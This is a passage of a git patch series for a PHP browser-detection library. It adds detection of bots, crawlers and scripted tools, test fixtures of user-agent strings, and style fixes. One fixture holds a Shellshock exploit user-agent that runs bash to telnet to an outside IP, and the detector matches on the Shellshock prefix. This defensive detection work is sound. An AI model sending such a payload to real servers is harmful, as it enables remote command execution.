checkRobotPerl() */ public static function checkRobotWget() { - if (stripos(self::$userAgentString, "Wget/") !== false) - { + if (stripos(self::$userAgentString, "Wget/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::WGET); self::$scriptedAgent->setType(ScriptedAgent::TOOL); self::$scriptedAgent->setInfoURL("https://www.gnu.org/software/wget/"); @@ -601,8 +568,7 @@ public static function checkRobotWget() */ public static function checkRobotZGrab() { - if (stripos(self::$userAgentString, "zgrab/") !== false) - { + if (stripos(self::$userAgentString, "zgrab/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::ZGRAB); self::$scriptedAgent->setType(ScriptedAgent::TOOL); self::$scriptedAgent->setInfoURL("https://github.com/zmap/zgrab"); @@ -618,8 +584,7 @@ public static function checkRobotZGrab() */ public static function checkRobotJava() { - if (stripos(self::$userAgentString, "Java/") !== false) - { + if (stripos(self::$userAgentString, "Java/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::JAVA); self::$scriptedAgent->setType(ScriptedAgent::GENERIC); self::$scriptedAgent->setInfoURL("https://www.java.com/en/"); @@ -635,8 +600,7 @@ public static function checkRobotJava() */ public static function checkRobotShellshock() { - if (stripos(self::$userAgentString, "() { :;}; /bin/bash -c") !== false) - { + if (stripos(self::$userAgentString, "() { :;}; /bin/bash -c") !== false) { self::$scriptedAgent->setName(ScriptedAgent::SHELLSHOCK); self::$scriptedAgent->setType(ScriptedAgent::EXPLOIT); self::$scriptedAgent->setInfoURL("https://blog.cloudflare.com/inside-shellshock/"); @@ -652,8 +616,7 @@ public static function checkRobotShellshock() */ public static function checkRobotBrowershots() { - if (stripos(self::$userAgentString, "Browsershots") !== false) - { + if (stripos(self::$userAgentString, "Browsershots") !== false) { self::$scriptedAgent->setName(ScriptedAgent::BROWSERSHOTS); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("http://browsershots.org/"); @@ -669,8 +632,7 @@ public static function checkRobotBrowershots() */ public static function checkRobotWhois() { - if (stripos(self::$userAgentString, "who.is bot") !== false) - { + if (stripos(self::$userAgentString, "who.is bot") !== false) { self::$scriptedAgent->setName(ScriptedAgent::WHOIS); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("http://www.who.is/"); @@ -686,8 +648,7 @@ public static function checkRobotWhois() */ public static function checkRobotMageReport() { - if (stripos(self::$userAgentString, "MageReport") !== false) - { + if (stripos(self::$userAgentString, "MageReport") !== false) { self::$scriptedAgent->setName(ScriptedAgent::MAGEREPORT); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("https://www.magereport.com/"); @@ -703,8 +664,7 @@ public static function checkRobotMageReport() */ public static function checkRobotAdbeat() { - if (stripos(self::$userAgentString, "adbeat.com") !== false) - { + if (stripos(self::$userAgentString, "adbeat.com") !== false) { self::$scriptedAgent->setName(ScriptedAgent::ADBEAT); self::$scriptedAgent->setType(ScriptedAgent::ADVERTISING); self::$scriptedAgent->setInfoURL("https://www.adbeat.com/operation_policy"); @@ -720,8 +680,7 @@ public static function checkRobotAdbeat() */ public static function checkRobotSocialrank() { - if (stripos(self::$userAgentString, "SocialRankIOBot") !== false) - { + if (stripos(self::$userAgentString, "SocialRankIOBot") !== false) { self::$scriptedAgent->setName(ScriptedAgent::SOCIALRANK); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("http://socialrank.io/about"); @@ -737,8 +696,7 @@ public static function checkRobotSocialrank() */ public static function checkRobotGlutenFree() { - if (stripos(self::$userAgentString, "Gluten Free Crawler/") !== false) - { + if (stripos(self::$userAgentString, "Gluten Free Crawler/") !== false) { self::$scriptedAgent->setName(ScriptedAgent::GLUTENFREE); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("http://glutenfreepleasure.com/"); @@ -754,8 +712,7 @@ public static function checkRobotGlutenFree() */ public static function checkRobotProximic() { - if (stripos(self::$userAgentString, "proximic;") !== false) - { + if (stripos(self::$userAgentString, "proximic;") !== false) { self::$scriptedAgent->setName(ScriptedAgent::PROXIMIC); self::$scriptedAgent->setType(ScriptedAgent::SPIDER); self::$scriptedAgent->setInfoURL("http://www.proximic.com/info/spider.php"); @@ -771,8 +728,7 @@ public static function checkRobotProximic() */ public static function checkRobotUbermetrics() { - if (stripos(self::$userAgentString, "@ubermetrics-technologies.com") !== false) - { + if (stripos(self::$userAgentString, "@ubermetrics-technologies.com") !== false) { self::$scriptedAgent->setName(ScriptedAgent::UBERMETRICS); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("https://www.ubermetrics-technologies.com/"); @@ -788,8 +744,7 @@ public static function checkRobotUbermetrics() */ public static function checkRobotVerisign() { - if (stripos(self::$userAgentString, "ips-agent") !== false) - { + if (stripos(self::$userAgentString, "ips-agent") !== false) { self::$scriptedAgent->setName(ScriptedAgent::VERISIGN); self::$scriptedAgent->setType(ScriptedAgent::SURVEY); self::$scriptedAgent->setInfoURL("http://www.spambotsecurity.com/forum/viewtopic.php?f=7&t=1453"); From ea8a4c3e395caa0179106ec56fe11ce7d35c4388 Mon Sep 17 00:00:00 2001 From: Tom Mettam Date: Thu, 6 Apr 2017 19:52:54 +0100 Subject: [PATCH 12/19] Add tests for the scripted agent detection --- .../Tests/ScriptedAgentDetectorTest.php | 10 +- .../Tests/ScriptedAgentTest.php | 6 +- .../Tests/_files/UserAgentStrings.xml | 737 +++++++++++++++++- .../Tests/_includes/UserAgentString.php | 46 ++ .../Tests/_includes/UserAgentStringMapper.php | 43 +- 5 files changed, 829 insertions(+), 13 deletions(-) diff --git a/tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php b/tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php index 6f015ff..91a5d08 100644 --- a/tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php +++ b/tests/BrowserDetector/Tests/ScriptedAgentDetectorTest.php @@ -3,11 +3,17 @@ namespace Sinergi\BrowserDetector\Tests; use PHPUnit_Framework_TestCase; +use Sinergi\BrowserDetector\ScriptedAgent; class ScriptedAgentDetectorTest extends PHPUnit_Framework_TestCase { - public function testExample() + public function testDetect() { - $this->assertNotFalse(false); + $userAgentStringCollection = UserAgentStringMapper::map(); + foreach ($userAgentStringCollection as $userAgentString) { + $agent = new ScriptedAgent($userAgentString->getString()); + $this->assertSame($userAgentString->getScriptedAgent(), $agent->getName()); + $this->assertSame($userAgentString->getScriptedAgentType(), $agent->getType()); + } } } diff --git a/tests/BrowserDetector/Tests/ScriptedAgentTest.php b/tests/BrowserDetector/Tests/ScriptedAgentTest.php index 63999b9..fb03756 100644 --- a/tests/BrowserDetector/Tests/ScriptedAgentTest.php +++ b/tests/BrowserDetector/Tests/ScriptedAgentTest.php @@ -3,11 +3,13 @@ namespace Sinergi\BrowserDetector\Tests; use PHPUnit_Framework_TestCase; +use Sinergi\BrowserDetector\ScriptedAgent; class ScriptedAgentTest extends PHPUnit_Framework_TestCase { - public function testExample() + public function testDetect() { - $this->assertNotFalse(false); + $agent = new ScriptedAgent(); + $this->assertSame(ScriptedAgent::UNKNOWN, $agent->getName()); } } diff --git a/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml b/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml index 99d8945..a342b23 100644 --- a/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml +++ b/tests/BrowserDetector/Tests/_files/UserAgentStrings.xml @@ -3,11 +3,13 @@ Opera - 21.0.1432.67 + 21.0.1432.67 OS X 10.9.3 unknown unknown + unknown + unknown Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.132 Safari/537.36 OPR/21.0.1432.67 @@ -20,6 +22,8 @@ 3.2 iPad unknown + unknown + unknown Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc @@ -32,6 +36,8 @@ 8.1.2 iPhone unknown + unknown + unknown Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 @@ -44,6 +50,8 @@ 10.10.2 unknown unknown + unknown + unknown Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36 @@ -56,6 +64,8 @@ 10.10.2 unknown unknown + unknown + unknown Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 YaBrowser/15.6.2311.3451 (beta) Yowser/2.0 Safari/537.36 @@ -68,6 +78,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) @@ -80,6 +92,8 @@ 10.10 unknown unknown + unknown + unknown Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0) Gecko/20100101 Firefox/35.0 @@ -91,6 +105,8 @@ 8.1.2 iPhone unknown + unknown + unknown Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) OPiOS/10.1.1.92212 Mobile/12B440 Safari/9537.53 @@ -103,6 +119,8 @@ 8.1.2 iPhone unknown + unknown + unknown Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/12B440 Safari/600.1.4 @@ -115,6 +133,8 @@ 10.0 unknown unknown + unknown + unknown Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10136 @@ -127,6 +147,8 @@ 10.0 unknown unknown + unknown + unknown Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 @@ -138,6 +160,8 @@ 7 unknown unknown + unknown + unknown Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.89 Vivaldi/1.0.83.38 Safari/537.36 @@ -149,6 +173,8 @@ 47.0.2526.80 unknown unknown + unknown + unknown Mozilla/5.0 (X11; CrOS x86_64 7520.62.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36 @@ -160,6 +186,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) @@ -171,6 +199,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) @@ -182,6 +212,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) @@ -193,6 +225,8 @@ 7 unknown unknown + unknown + unknown Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) @@ -204,6 +238,8 @@ 8 unknown unknown + unknown + unknown Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7 @@ -215,6 +251,8 @@ unknown unknown unknown + unknown + unknown Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5 @@ -226,6 +264,8 @@ 10.0.9.2372 unknown unknown + unknown + unknown Mozilla/5.0 (BB10; Touch) AppleWebKit/537.10+ (KHTML, like Gecko) Version/10.0.9.2372 Mobile Safari/537.10+ @@ -237,6 +277,8 @@ 10 Lumia 640 LTE unknown + unknown + unknown Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1; Microsoft; Lumia 640 LTE) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Mobile Safari/537.36 Edge/14.14393 @@ -259,6 +301,8 @@ 7.1.0.523 unknown unknown + unknown + unknown Mozilla/5.0 (BlackBerry; U; BlackBerry 9380; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.523 Mobile Safari/534.11+ @@ -270,9 +314,700 @@ 5.1.1 Samsung SM-G360T1 unknown + unknown + unknown Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-G360T1 Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102 Mobile Safari/537.36 + + Safari + unknown + Linux + unknown + unknown + unknown + wkhtmltopdf + Tool + + Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) wkhtmltopdf-amd64 Safari/534.34 + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Baidu + Spider + + Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Baidu + Spider + + Baiduspider+(+http://www.baidu.com/search/spider_jp.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Baidu + Spider + + BaiDuSpider + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Google + Spider + + Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google + Spider + + Googlebot/2.1 (+http://www.google.com/bot.html) + + + + Chrome + 41.0.2272.96 + Android + 6.0.1 + unknown + unknown + Google + Spider + + ​Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google + Spider + + Googlebot-News + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google + Spider + + Googlebot-Image/1.0 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google + Spider + + Googlebot-Video/1.0 + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Google Ads + Ad bots + + Mozilla/5.0 (compatible; Mediapartners-Google/2.1; +http://www.google.com/bot.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google Ads + Ad bots + + Mediapartners-Google + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google Ads + Ad bots + + AdsBot-Google (+http://www.google.com/adsbot.html) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Google Ads + Ad bots + + AdsBot-Google-Mobile-Apps + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Yahoo! Slurp + Spider + + Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Bing + Spider + + Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) + + + + unknown + unknown + unknown + unknown + unknown + unknown + MSN + Spider + + msnbot/2.0b (+http://search.msn.com/msnbot.htm) + + + + unknown + unknown + unknown + unknown + unknown + unknown + MSN + Spider + + msnbot-media/1.1 (+http://search.msn.com/msnbot.htm) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Bing + Ad bots + + Mozilla/5.0 (compatible; adidxbot/2.0; +http://www.bing.com/bingbot.htm) + + + + Mozilla + 5.0 + Windows + 7 + unknown + unknown + Bing + Preview + + Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b + + + + unknown + unknown + unknown + unknown + unknown + unknown + W3C Validator + Tool + + W3C_Validator/1.0 libwww-perl/0.40 + + + + Safari + 8.0 + iOS + 8.1 + iPhone + unknown + Yandex + Spider + + Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexBot/3.0; +http://yandex.com/bots) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Gluten Free + Survey + + Mozilla/5.0 (compatible; Gluten Free Crawler/1.0; +http://glutenfreepleasure.com/) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Twitter + Preview + + Twitterbot/1.0 + + + + Safari + 8.0.2 + OS X + 10.10.1 + unknown + unknown + Apple + Spider + + Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Applebot/0.1) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Paper.li + Spider + + Mozilla/5.0 (compatible; PaperLiBot/2.1; http://support.paper.li/entries/20023257-what-is-paper-li) + + + + unknown + unknown + unknown + unknown + unknown + unknown + SocialRank.io + Survey + + SocialRankIOBot; http://socialrank.io/about + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Ahrefs.com Backlink Research Tool + Survey + + Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/) + + + + unknown + unknown + unknown + unknown + unknown + unknown + Majestic12 + Spider + + MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+) + + + + unknown + unknown + unknown + unknown + unknown + unknown + LiveLap + Spider + + LivelapBot/0.2 (http://site.livelap.com/crawler) + + + + Mozilla + 5.0 + Windows + 7 + unknown + unknown + Skype + Preview + + Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5 + + + + Safari + unknown + Linux + unknown + unknown + unknown + AdBeat + Ad bots + + Mozilla/5.0 (X11; U; Linux x86; %lang_code%) adbeat.com/policy Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3 AppleWebKit/532.4 Safari/532.4 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Facebook + Preview + + facebookexternalhit/1.0 + + + + unknown + unknown + unknown + unknown + unknown + unknown + WEBDAV + Tool + + WEBDAV Client + + + + Firefox + 6.0 + Windows + 7 + unknown + unknown + Google Favicon + Scripted Agent + + Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google favicon + + + + unknown + unknown + unknown + unknown + unknown + unknown + MetaURI + Survey + + MetaURI API/2.0 metauri.com + + + + unknown + unknown + unknown + unknown + unknown + unknown + TLSProbe + Tool + + TLSProbe/1.0 (+https://scan.trustnet.venafi.com/) + + + + Safari + unknown + Linux + unknown + unknown + unknown + Scoop.it + Spider + + Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) imgsizer Safari/537.21 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Netcraft SSL + Survey + + Netcraft SSL Server Survey - contact info@netcraft.com + + + + unknown + unknown + unknown + unknown + unknown + unknown + Curl + Scripted Agent + + curl/7.37.0 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Python + Scripted Agent + + python-urllib/12.0 + + + + unknown + unknown + unknown + unknown + unknown + unknown + GoLang + Scripted Agent + + Go-http-client/1.0 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Perl + Scripted Agent + + libwww-perl/1.0 + + + + Firefox + 3.5.3 + Linux + unknown + unknown + unknown + Verisign + Survey + + Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3 + + + + unknown + unknown + Linux + unknown + unknown + unknown + Wget + Tool + + Wget/1.13.4 (linux-gnu) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + ZGrab + Tool + + Mozilla/5.0 zgrab/0.3 + + + + unknown + unknown + unknown + unknown + unknown + unknown + Java + Scripted Agent + + Java/1.6.0_14 + + + + unknown + unknown + unknown + unknown + unknown + unknown + ShellShock exploit + Exploit attempt + + () { :;}; /bin/bash -c \x22telnet 197.242.148.29 9999\x22 () { :; }; echo -e \x22Content-Type: text/plain\x5Cn\x22; echo qQQQQQq + + + + unknown + unknown + unknown + unknown + unknown + unknown + BrowserShots + Survey + + BrowserShots + + + + unknown + unknown + unknown + unknown + unknown + unknown + Who.is + Spider + + Who.is Bot + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + MageReport + Survey + + Mozilla/5.0 (www.magereport.com/page/about) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Ubermetrics Technologies + Survey + + Mozilla/5.0 (compatible; um-LN/1.0; mailto: techinfo@ubermetrics-technologies.com) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Proximic + Spider + + Mozilla/5.0 (compatible; proximic; +http://www.proximic.com/info/spider.php) + + diff --git a/tests/BrowserDetector/Tests/_includes/UserAgentString.php b/tests/BrowserDetector/Tests/_includes/UserAgentString.php index 919e18e..4bdcfc3 100644 --- a/tests/BrowserDetector/Tests/_includes/UserAgentString.php +++ b/tests/BrowserDetector/Tests/_includes/UserAgentString.php @@ -39,6 +39,16 @@ class UserAgentString */ private $string; + /** + * @var string + */ + private $scriptedAgent; + + /** + * @var string + */ + private $scriptedAgentType; + /** * @return string */ @@ -178,4 +188,40 @@ public function setDeviceVersion($deviceVersion) return $this; } + + /** + * @return string + */ + public function getScriptedAgent() + { + return $this->scriptedAgent; + } + + /** + * @param string $scriptedAgent + * + * @return string + */ + public function setScriptedAgent($scriptedAgent) + { + $this->scriptedAgent = $scriptedAgent; + } + + /** + * @return string + */ + public function getScriptedAgentType() + { + return $this->scriptedAgentType; + } + + /** + * @param string $scriptedAgentType + * + * @return string + */ + public function setScriptedAgentType($scriptedAgentType) + { + $this->scriptedAgentType = $scriptedAgentType; + } } diff --git a/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php b/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php index 08ff5e6..ae62aac 100644 --- a/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php +++ b/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php @@ -13,16 +13,43 @@ public static function map() { $collection = array(); $xml = new SimpleXmlElement(file_get_contents(FILES . DIRECTORY_SEPARATOR . 'UserAgentStrings.xml')); + foreach ($xml->strings->string as $string) { - $string = $string->field; $userAgentString = new UserAgentString(); - $userAgentString->setBrowser((string)$string[0]); - $userAgentString->setBrowserVersion((string)$string[1]); - $userAgentString->setOs((string)$string[2]); - $userAgentString->setOsVersion((string)$string[3]); - $userAgentString->setDevice((string)$string[4]); - $userAgentString->setDeviceVersion((string)$string[5]); - $userAgentString->setString(str_replace(array(PHP_EOL, ' '), ' ', (string)$string[6])); + foreach($string->children() as $child) + { + $attributes = $child->attributes(); + switch($attributes['name']) + { + case "browser": + $userAgentString->setBrowser((string)$child[0]); + break; + case "version": + $userAgentString->setBrowserVersion((string)$child[0]); + break; + case "os": + $userAgentString->setOs((string)$child[0]); + break; + case "os_version": + $userAgentString->setOsVersion((string)$child[0]); + break; + case "device": + $userAgentString->setDevice((string)$child[0]); + break; + case "device_version": + $userAgentString->setDeviceVersion((string)$child[0]); + break; + case "scripted_agent": + $userAgentString->setScriptedAgent((string)$child[0]); + break; + case "scripted_agent_type": + $userAgentString->setScriptedAgentType((string)$child[0]); + break; + case "string": + $userAgentString->setString(str_replace(array(PHP_EOL, ' '), ' ', (string)(string)$child[0])); + break; + } + } $collection[] = $userAgentString; } From 301f64c4b9493b4f8e7208d161086108921cb351 Mon Sep 17 00:00:00 2001 From: Tom Mettam Date: Thu, 6 Apr 2017 20:16:02 +0100 Subject: [PATCH 13/19] Fix code style --- .../Tests/_includes/UserAgentStringMapper.php | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php b/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php index ae62aac..7aba697 100644 --- a/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php +++ b/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php @@ -16,11 +16,9 @@ public static function map() foreach ($xml->strings->string as $string) { $userAgentString = new UserAgentString(); - foreach($string->children() as $child) - { + foreach ($string->children() as $child) { $attributes = $child->attributes(); - switch($attributes['name']) - { + switch ($attributes['name']) { case "browser": $userAgentString->setBrowser((string)$child[0]); break; From 80b9c26e9983391189ae63d861d11f199d42c00d Mon Sep 17 00:00:00 2001 From: Gabriel Bull Date: Tue, 11 Apr 2017 21:55:33 -0400 Subject: [PATCH 14/19] Few style changes --- src/Browser.php | 105 +++++++++++--------------- src/BrowserDetector.php | 2 - src/ScriptedAgentDetector.php | 135 ++++++++++++---------------------- 3 files changed, 86 insertions(+), 156 deletions(-) diff --git a/src/Browser.php b/src/Browser.php index e2e2e4c..0ba35ec 100644 --- a/src/Browser.php +++ b/src/Browser.php @@ -89,7 +89,6 @@ class Browser /** * @param null|string|UserAgent $userAgent - * * @throws \Sinergi\BrowserDetector\InvalidArgumentException */ public function __construct($userAgent = null) @@ -107,13 +106,11 @@ public function __construct($userAgent = null) * Set the name of the Browser. * * @param string $name - * * @return $this */ public function setName($name) { $this->name = (string)$name; - return $this; } @@ -135,7 +132,6 @@ public function getName() * Check to see if the specific browser is valid. * * @param string $name - * * @return bool */ public function isBrowser($name) @@ -147,13 +143,11 @@ public function isBrowser($name) * Set the version of the browser. * * @param string $version - * * @return $this */ public function setVersion($version) { $this->version = (string)$version; - return $this; } @@ -181,69 +175,61 @@ public function getVersion() public function detectScriptedAgent() { $ua = $this->getUserAgent()->getUserAgentString(); - if (stripos($ua, 'bot') !== FALSE || - stripos($ua, 'spider') !== FALSE || - stripos($ua, 'crawler') !== FALSE || - stripos($ua, 'preview') !== FALSE || - stripos($ua, 'slurp') !== FALSE || - stripos($ua, 'facebookexternalhit') !== FALSE || - stripos($ua, 'mediapartners') !== FALSE || - stripos($ua, 'google-adwords') !== FALSE || - stripos($ua, 'adxvastfetcher') !== FALSE || - stripos($ua, 'adbeat') !== FALSE || - stripos($ua, 'google favicon') !== FALSE || - stripos($ua, 'webdav client') !== FALSE || - stripos($ua, 'metauri api') !== FALSE || - stripos($ua, 'tlsprobe') !== FALSE || - stripos($ua, 'wpif') !== FALSE || - stripos($ua, 'imgsizer') !== FALSE || - stripos($ua, 'netcraft ssl server survey') !== FALSE || - stripos($ua, 'curl/') !== FALSE || - stripos($ua, 'go-http-client/') !== FALSE || - stripos($ua, 'python') !== FALSE || - stripos($ua, 'libwww') !== FALSE || - stripos($ua, 'wget/') !== FALSE || - stripos($ua, 'zgrab/') !== FALSE || - stripos($ua, 'Java/') !== FALSE || - stripos($ua, '() { :;}; /bin/bash -c') !== FALSE || - stripos($ua, 'browsershots') !== FALSE || - stripos($ua, 'magereport') !== FALSE || - stripos($ua, 'ubermetrics-technologies') !== FALSE || - stripos($ua, 'W3C') !== FALSE || - stripos($ua, 'Validator') !== FALSE || - stripos($ua, 'Jigsaw/') !== FALSE || - stripos($ua, 'bing') !== FALSE || - stripos($ua, 'msn') !== FALSE || - stripos($ua, 'Google Web Preview') !== FALSE || - stripos($ua, 'ips-agent') !== FALSE || - (stripos($ua, 'Chrome/51.0.2704.103') !== FALSE && !isset($_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']) && stristr($_SERVER['HTTP_ACCEPT_LANGUAGE'], "ru-RU") !== FALSE) //ICQ Preview - ) - { + if (stripos($ua, 'bot') !== false || + stripos($ua, 'spider') !== false || + stripos($ua, 'crawler') !== false || + stripos($ua, 'preview') !== false || + stripos($ua, 'slurp') !== false || + stripos($ua, 'facebookexternalhit') !== false || + stripos($ua, 'mediapartners') !== false || + stripos($ua, 'google-adwords') !== false || + stripos($ua, 'adxvastfetcher') !== false || + stripos($ua, 'adbeat') !== false || + stripos($ua, 'google favicon') !== false || + stripos($ua, 'webdav client') !== false || + stripos($ua, 'metauri api') !== false || + stripos($ua, 'tlsprobe') !== false || + stripos($ua, 'wpif') !== false || + stripos($ua, 'imgsizer') !== false || + stripos($ua, 'netcraft ssl server survey') !== false || + stripos($ua, 'curl/') !== false || + stripos($ua, 'go-http-client/') !== false || + stripos($ua, 'python') !== false || + stripos($ua, 'libwww') !== false || + stripos($ua, 'wget/') !== false || + stripos($ua, 'zgrab/') !== false || + stripos($ua, 'Java/') !== false || + stripos($ua, '() { :;}; /bin/bash -c') !== false || + stripos($ua, 'browsershots') !== false || + stripos($ua, 'magereport') !== false || + stripos($ua, 'ubermetrics-technologies') !== false || + stripos($ua, 'W3C') !== false || + stripos($ua, 'Validator') !== false || + stripos($ua, 'Jigsaw/') !== false || + stripos($ua, 'bing') !== false || + stripos($ua, 'msn') !== false || + stripos($ua, 'Google Web Preview') !== false || + stripos($ua, 'ips-agent') !== false || + (stripos($ua, 'Chrome/51.0.2704.103') !== false && !isset($_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']) && stristr($_SERVER['HTTP_ACCEPT_LANGUAGE'], "ru-RU") !== false) //ICQ Preview + 